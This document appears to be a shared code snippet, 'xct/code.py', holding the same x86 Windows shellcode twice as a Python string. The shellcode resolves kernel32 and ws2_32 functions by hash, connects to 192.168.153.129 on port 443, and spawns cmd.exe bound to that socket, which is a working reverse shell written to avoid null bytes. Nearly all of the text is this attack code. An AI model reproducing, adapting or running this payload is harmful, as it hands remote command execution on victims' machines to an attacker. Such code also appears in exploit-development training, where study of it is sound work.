xct/code.py Secret

## code.py
CODE = (
" start: "
#"  int3 ;"
"  mov ebp, esp ;"
"  add esp, 0xfffff9f0 ;"

" find_kernel32: "
"  xor ecx, ecx ;"
"  mov esi,fs:[ecx+30h] ;"
"  mov esi,[esi+0Ch] ;"
"  mov esi,[esi+1Ch] ;"

" next_module: "
"  mov ebx, [esi+8h] ;"
"  mov edi, [esi+20h] ;"
"  mov esi, [esi] ;"
"  cmp [edi+12*2], cx ;"
"  jne next_module ;"

" find_function_shorten: "
"  jmp find_function_shorten_bnc ;"

" find_function_ret: "
"  pop esi ;" # ret addr, start of find_function
"  mov [ebp+0x04], esi ;"
"  jmp resolve_symbols_kernel32 ;"

" find_function_shorten_bnc: "
"  call find_function_ret ;" # rel call

" find_function: "
"  pushad ;"
"  mov eax, [ebx+0x3c] ;"
"  mov edi, [ebx+eax+0x78] ;"
"  add edi, ebx ;"
"  mov ecx, [edi+0x18] ;"
"  mov eax, [edi+0x20] ;"
"  add eax, ebx ;"
"  mov [ebp-4], eax ;"

" find_function_loop: "
"  jecxz find_function_finished ;"
"  dec ecx ;"
"  mov eax, [ebp-4] ;"
"  mov esi, [eax+ecx*4] ;"
"  add esi, ebx ;"

" compute_hash: "
"  xor eax, eax ;"
"  cdq ;"
"  cld ;"

" compute_hash_again: "
"  lodsb ;"
"  test al, al ;"
"  jz compute_hash_finished ;"
"  ror edx, 0x0d ;"
"  add edx, eax ;"
"  jmp compute_hash_again ;"

" compute_hash_finished: "
" find_function_compare: "
"  cmp edx, [esp+0x24] ;"
"  jnz find_function_loop ;"
"  mov edx, [edi+0x24] ;"
"  add edx, ebx ;"
"  mov cx, [edx+2*ecx] ;"
"  mov edx, [edi+0x1c] ;"
"  add edx, ebx ;"
"  mov eax, [edx+4*ecx] ;"
"  add eax, ebx ;"
"  mov [esp+0x1c], eax ;"

" find_function_finished: "
"  popad ;"
"  ret ;"

" resolve_symbols_kernel32: "
"  push 0x78b5b983 ;" # Exit hash
"  call dword ptr [ebp+0x04] ;"
"  mov [ebp+0x10], eax ;"
"  push 0xec0e4e8e ;" # LoadLibraryA hash
"  call dword ptr [ebp+0x04] ;"
"  mov [ebp+0x14], eax ;"
"  push 0x16b3fe72 ;" # CreateProcessA hash
"  call dword ptr [ebp+0x04] ;"
"  mov [ebp+0x18], eax ;"

" load_ws2_32: "
"  xor eax, eax ;"
"  mov ax, 0x6c6c ;" # ws2_32.dll string pushed in a null byte free way
"  push eax ;"
"  push 0x642e3233 ;"
"  push 0x5f327377 ;"
"  push esp ;"
"  call dword ptr [ebp+0x14] ;" # Call LoadLibraryA, returns handle to module (base addr)

" resolve_symbols_ws2_32: "
"  mov ebx, eax ;"  # base address of ws2_32.dll
"  push 0x3bfcedcb ;" # WSAStartup
"  call dword ptr [ebp+0x04] ;"
"  mov [ebp+0x1C], eax ;"
"  push 0xadf509d9 ;" # WSASocketA
"  call dword ptr [ebp+0x04] ;"
"  mov [ebp+0x20], eax ;"
"  push 0xb32dba0c ;" # WSAConnect
"  call dword ptr [ebp+0x04] ;"
"  mov [ebp+0x24], eax ;"

" call_wsastartup: " # init Winsock DLL https://docs.microsoft.com/en-us/windows/win32/api/winsock/nf-winsock-wsastartup
"  mov eax, esp ;"
"  xor ecx, ecx ;"
"  mov cx, 0x590 ;"
"  sub eax, ecx ;"
"  push eax ;"
"  xor eax, eax ;"
"  mov ax, 0x0202 ;" # wVersionRequired
"  push eax ;"
"  call dword ptr [ebp+0x1C] ;" # Call WSAStartup

" call_wsasocketa: "
"  xor eax, eax ;"
"  push eax ;"
"  push eax ;"
"  push eax ;"
"  mov al, 0x06 ;" # proto
"  push eax ;"
"  sub al, 0x05 ;" # 1
"  push eax ;"
"  inc eax ;" # 2
"  push eax ;"
"  call dword ptr [ebp+0x20] ;" # Call WSASocketA

" call_wsaconnect: "
"  mov esi, eax ;"
"  xor eax, eax ;"
"  push eax ;" # sin_zero[]
"  push eax ;" # sin_zero[]
"  push 0x8199a8c0 ;" # sin_addr (192.168.153.129)
"  mov ax, 0xbb01 ;" # sin_port (443) to AX
"  shl eax, 0x10 ;"
"  add ax, 0x02 ;"
"  push eax ;" # sin_port & sin_family
"  push esp ;" # ptr to the sockaddr_in
"  pop edi ;"
"  xor eax, eax ;"
"  push eax ;"
"  push eax ;"
"  push eax ;"
"  push eax ;"
"  add al, 0x10 ;"
"  push eax ;" # namelen
"  push edi ;" # *name
"  push esi ;" # s
"  call dword ptr [ebp+0x24] ;" # Call WSASocketA

" create_startupinfoa: "
"  push esi ;" # hStdInput,
"  push esi ;" # hStdOutput
"  push esi ;" # hStdError
"  xor eax, eax ;"
"  push eax ;"
"  push eax ;"
"  mov al, 0x80 ;"
"  xor ecx, ecx ;"
"  mov cx, 0x80 ;"
"  add eax, ecx ;"
"  push eax ;"
"  xor eax, eax ;"
"  push eax ;"
"  push eax ;"
"  push eax ;"
"  push eax ;"
"  push eax ;"
"  push eax ;"
"  push eax ;"
"  push eax ;"
"  push eax ;"
"  push eax ;"
"  mov al, 0x44 ;"
"  push eax ;"
"  push esp ;"
"  pop edi ;"

" create_cmd_string: "
"  mov eax, 0xff9a879b ;"
"  neg eax ;"
"  push eax ;"
"  push 0x2e646d63 ;"
"  push esp ;"
"  pop ebx ;"

" call_createprocessa: " #
" mov eax, esp ;"
" xor ecx, ecx ;"
" mov cx, 0x390 ;"
" sub eax, ecx ;"
" push eax ;" #  lpProcessInformation
" push edi ;" #  lpStartupInfo
" xor eax, eax ;"
" push eax ;" # lpCurrentDirectory
" push eax ;" # lpEnvironment
" push eax ;" # dwCreationFlags
" inc eax ;"
" push eax ;"
" dec eax ;"
" push eax ;" # lpThreadAttributes
" push eax ;" # lpProcessAttributes
" push ebx ;" # lpCommandLine
" push eax ;" # lpApplicationName
" call dword ptr [ebp+0x18] ;" # Call CreateProcessA

" exec_shellcode: "
"  xor ecx, ecx ;"
"  push ecx ;"
"  push 0xffffffff ;"
"  call dword ptr [ebp+0x10] ;" # Call Func
)
	CODE = (
	" start: "
	#" int3 ;"
	" mov ebp, esp ;"
	" add esp, 0xfffff9f0 ;"

	" find_kernel32: "
	" xor ecx, ecx ;"
	" mov esi,fs:[ecx+30h] ;"
	" mov esi,[esi+0Ch] ;"
	" mov esi,[esi+1Ch] ;"

	" next_module: "
	" mov ebx, [esi+8h] ;"
	" mov edi, [esi+20h] ;"
	" mov esi, [esi] ;"
	" cmp [edi+12*2], cx ;"
	" jne next_module ;"

	" find_function_shorten: "
	" jmp find_function_shorten_bnc ;"

	" find_function_ret: "
	" pop esi ;" # ret addr, start of find_function
	" mov [ebp+0x04], esi ;"
	" jmp resolve_symbols_kernel32 ;"

	" find_function_shorten_bnc: "
	" call find_function_ret ;" # rel call

	" find_function: "
	" pushad ;"
	" mov eax, [ebx+0x3c] ;"
	" mov edi, [ebx+eax+0x78] ;"
	" add edi, ebx ;"
	" mov ecx, [edi+0x18] ;"
	" mov eax, [edi+0x20] ;"
	" add eax, ebx ;"
	" mov [ebp-4], eax ;"

	" find_function_loop: "
	" jecxz find_function_finished ;"
	" dec ecx ;"
	" mov eax, [ebp-4] ;"
	" mov esi, [eax+ecx*4] ;"
	" add esi, ebx ;"

	" compute_hash: "
	" xor eax, eax ;"
	" cdq ;"
	" cld ;"

	" compute_hash_again: "
	" lodsb ;"
	" test al, al ;"
	" jz compute_hash_finished ;"
	" ror edx, 0x0d ;"
	" add edx, eax ;"
	" jmp compute_hash_again ;"

	" compute_hash_finished: "
	" find_function_compare: "
	" cmp edx, [esp+0x24] ;"
	" jnz find_function_loop ;"
	" mov edx, [edi+0x24] ;"
	" add edx, ebx ;"
	" mov cx, [edx+2*ecx] ;"
	" mov edx, [edi+0x1c] ;"
	" add edx, ebx ;"
	" mov eax, [edx+4*ecx] ;"
	" add eax, ebx ;"
	" mov [esp+0x1c], eax ;"

	" find_function_finished: "
	" popad ;"
	" ret ;"

	" resolve_symbols_kernel32: "
	" push 0x78b5b983 ;" # Exit hash
	" call dword ptr [ebp+0x04] ;"
	" mov [ebp+0x10], eax ;"
	" push 0xec0e4e8e ;" # LoadLibraryA hash
	" call dword ptr [ebp+0x04] ;"
	" mov [ebp+0x14], eax ;"
	" push 0x16b3fe72 ;" # CreateProcessA hash
	" call dword ptr [ebp+0x04] ;"
	" mov [ebp+0x18], eax ;"

	" load_ws2_32: "
	" xor eax, eax ;"
	" mov ax, 0x6c6c ;" # ws2_32.dll string pushed in a null byte free way
	" push eax ;"
	" push 0x642e3233 ;"
	" push 0x5f327377 ;"
	" push esp ;"
	" call dword ptr [ebp+0x14] ;" # Call LoadLibraryA, returns handle to module (base addr)

	" resolve_symbols_ws2_32: "
	" mov ebx, eax ;" # base address of ws2_32.dll
	" push 0x3bfcedcb ;" # WSAStartup
	" call dword ptr [ebp+0x04] ;"
	" mov [ebp+0x1C], eax ;"
	" push 0xadf509d9 ;" # WSASocketA
	" call dword ptr [ebp+0x04] ;"
	" mov [ebp+0x20], eax ;"
	" push 0xb32dba0c ;" # WSAConnect
	" call dword ptr [ebp+0x04] ;"
	" mov [ebp+0x24], eax ;"

	" call_wsastartup: " # init Winsock DLL https://docs.microsoft.com/en-us/windows/win32/api/winsock/nf-winsock-wsastartup
	" mov eax, esp ;"
	" xor ecx, ecx ;"
	" mov cx, 0x590 ;"
	" sub eax, ecx ;"
	" push eax ;"
	" xor eax, eax ;"
	" mov ax, 0x0202 ;" # wVersionRequired
	" push eax ;"
	" call dword ptr [ebp+0x1C] ;" # Call WSAStartup

	" call_wsasocketa: "
	" xor eax, eax ;"
	" push eax ;"
	" push eax ;"
	" push eax ;"
	" mov al, 0x06 ;" # proto
	" push eax ;"
	" sub al, 0x05 ;" # 1
	" push eax ;"
	" inc eax ;" # 2
	" push eax ;"
	" call dword ptr [ebp+0x20] ;" # Call WSASocketA

	" call_wsaconnect: "
	" mov esi, eax ;"
	" xor eax, eax ;"
	" push eax ;" # sin_zero[]
	" push eax ;" # sin_zero[]
	" push 0x8199a8c0 ;" # sin_addr (192.168.153.129)
	" mov ax, 0xbb01 ;" # sin_port (443) to AX
	" shl eax, 0x10 ;"
	" add ax, 0x02 ;"
	" push eax ;" # sin_port & sin_family
	" push esp ;" # ptr to the sockaddr_in
	" pop edi ;"
	" xor eax, eax ;"
	" push eax ;"
	" push eax ;"
	" push eax ;"
	" push eax ;"
	" add al, 0x10 ;"
	" push eax ;" # namelen
	" push edi ;" # *name
	" push esi ;" # s
	" call dword ptr [ebp+0x24] ;" # Call WSASocketA

	" create_startupinfoa: "
	" push esi ;" # hStdInput,
	" push esi ;" # hStdOutput
	" push esi ;" # hStdError
	" xor eax, eax ;"
	" push eax ;"
	" push eax ;"
	" mov al, 0x80 ;"
	" xor ecx, ecx ;"
	" mov cx, 0x80 ;"
	" add eax, ecx ;"
	" push eax ;"
	" xor eax, eax ;"
	" push eax ;"
	" push eax ;"
	" push eax ;"
	" push eax ;"
	" push eax ;"
	" push eax ;"
	" push eax ;"
	" push eax ;"
	" push eax ;"
	" push eax ;"
	" mov al, 0x44 ;"
	" push eax ;"
	" push esp ;"
	" pop edi ;"

	" create_cmd_string: "
	" mov eax, 0xff9a879b ;"
	" neg eax ;"
	" push eax ;"
	" push 0x2e646d63 ;"
	" push esp ;"
	" pop ebx ;"

	" call_createprocessa: " #
	" mov eax, esp ;"
	" xor ecx, ecx ;"
	" mov cx, 0x390 ;"
	" sub eax, ecx ;"
	" push eax ;" # lpProcessInformation
	" push edi ;" # lpStartupInfo
	" xor eax, eax ;"
	" push eax ;" # lpCurrentDirectory
	" push eax ;" # lpEnvironment
	" push eax ;" # dwCreationFlags
	" inc eax ;"
	" push eax ;"
	" dec eax ;"
	" push eax ;" # lpThreadAttributes
	" push eax ;" # lpProcessAttributes
	" push ebx ;" # lpCommandLine
	" push eax ;" # lpApplicationName
	" call dword ptr [ebp+0x18] ;" # Call CreateProcessA

	" exec_shellcode: "
	" xor ecx, ecx ;"
	" push ecx ;"
	" push 0xffffffff ;"
	" call dword ptr [ebp+0x10] ;" # Call Func
	)